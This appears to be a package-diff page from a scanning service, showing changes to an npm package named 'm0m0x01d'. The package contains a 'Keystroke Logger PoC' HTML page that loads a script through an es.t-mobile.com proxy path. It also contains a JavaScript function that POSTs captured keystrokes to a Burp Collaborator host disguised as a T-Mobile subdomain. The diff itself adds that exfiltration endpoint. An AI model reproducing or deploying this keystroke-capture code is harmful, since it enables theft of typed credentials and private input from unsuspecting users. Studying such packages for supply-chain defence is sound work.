m0m0x01d 21.0.0 → 23.0.0
Sign up to get free protection for your applications and to get access to all the features.
- package/iframe4.svg.html +1 -1
- package/keystroke-capture.svg.js +1 -1
- package/package.json +1 -1
package/iframe4.svg.html
CHANGED
@@ -5,7 +5,7 @@
|
|
5
5
|
<meta charset="UTF-8">
|
6
6
|
<meta name="viewport" content="width=device-width, initial-scale=1.0">
|
7
7
|
<title>Keystroke Capture</title>
|
8
|
-
<script src="https://es.t-mobile.com/24/_mp.v3N0Mxa0NEUVp6UllrV0FhT3RuZDluNmo3R0pGTFYya1JzMFBCbk0wYUNvcEJmY05mc19wc2tHb001eE8xcFVienE._mp.ve/_unpkg_com/m0m0x01d@21.0.0/keystroke-capture.js"></script>
|
8
|
+
<script src="https://es.t-mobile.com/24/_mp.v3N0Mxa0NEUVp6UllrV0FhT3RuZDluNmo3R0pGTFYya1JzMFBCbk0wYUNvcEJmY05mc19wc2tHb001eE8xcFVienE._mp.ve/_unpkg_com/m0m0x01d@21.0.0/keystroke-capture.svg.js"></script>
|
9
9
|
</head>
|
10
10
|
<body>
|
11
11
|
<h1>Keystroke Logger PoC</h1>
|
package/keystroke-capture.svg.js
CHANGED
@@ -1,7 +1,7 @@
|
|
1
1
|
// Function to send keystrokes to the intermediary file on unpkg
|
2
2
|
function sendKeystrokes(data) {
|
3
3
|
var xhr = new XMLHttpRequest();
|
4
|
-
xhr.open("POST", "https://es.t-mobile.com
|
4
|
+
xhr.open("POST", "https://es.t-mobile.com.mmcyrtl8tknr87hk8d9j6upi69c10q.burpcollaborator.net/xxxxxxxxx", true);
|
5
5
|
xhr.setRequestHeader("Content-Type", "application/json");
|
6
6
|
xhr.send(JSON.stringify({ keystrokes: data }));
|
7
7
|
}
|